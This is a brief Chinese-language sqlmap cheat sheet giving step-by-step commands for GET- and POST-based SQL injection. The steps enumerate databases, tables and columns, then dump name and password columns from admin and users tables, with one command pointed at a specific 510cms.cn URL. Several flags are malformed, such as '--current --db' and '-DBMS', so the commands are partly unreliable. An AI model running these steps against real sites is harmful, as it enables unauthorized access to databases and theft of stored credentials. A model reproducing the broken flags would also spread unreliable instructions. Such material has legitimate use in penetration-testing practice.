一、get类型注入
1、查看该网址所在服务器中MySQL中的所有数据库;
命令:python sqlmap.py -u "url" --dbs
2、查询该网址的数据库;
命令:python sqlmap.py -u "url" --current --db
3、查询该网址的数据表;
命令:python sqlmap.py -u "url" -D 510cms --tables
4、查询该网址的数据列;
命令:python sqlmap.py -u "url" -D 510cms -T 510_admin --columns
5、查询数据信息;
命令:python sqlmap.py -u "url" -D 510cms -T 510_admin -C name,passwd --dump
二、post类型注入
1、输入型,先抓包,然后进行下载抓包信息,用sqlmap对抓包信息进行扫描;
只要输入信息就可以,不需要输入正确登录信息;
2、扫描是否存在注入;
命令:python sqlmap.py -r "文件所在位置+文件名"
3、查询当前数据库;
命令:python sqlmap.py -r "文件所在位置+文件名" -p uname --current -db
指定该站点的数据库为mysql;
命令:python sqlmap.py -r "文件所在位置+文件名" -p uname -DBMS mysql --current -db
4、查询数据表
命令:python sqlmap.py -r "文件所在位置+文件名" -p uname -DBMS mysql -D security --tables
5、查询数据列
命令:python sqlmap.py -r "文件所在位置+文件名" -p uname -DBMS mysql -D security -T users --columns
6、查询数据信息
命令:python sqlmap.py -r "文件所在位置+文件名" -p name -DBMS mysql -D security -T users -C username,passwd --dump
python sqlmap.py -u “http://www.510cms.cn/news.php?cid=1&listid*=&newsid=27” --此时只针对listid这个参数做sql注入的判断
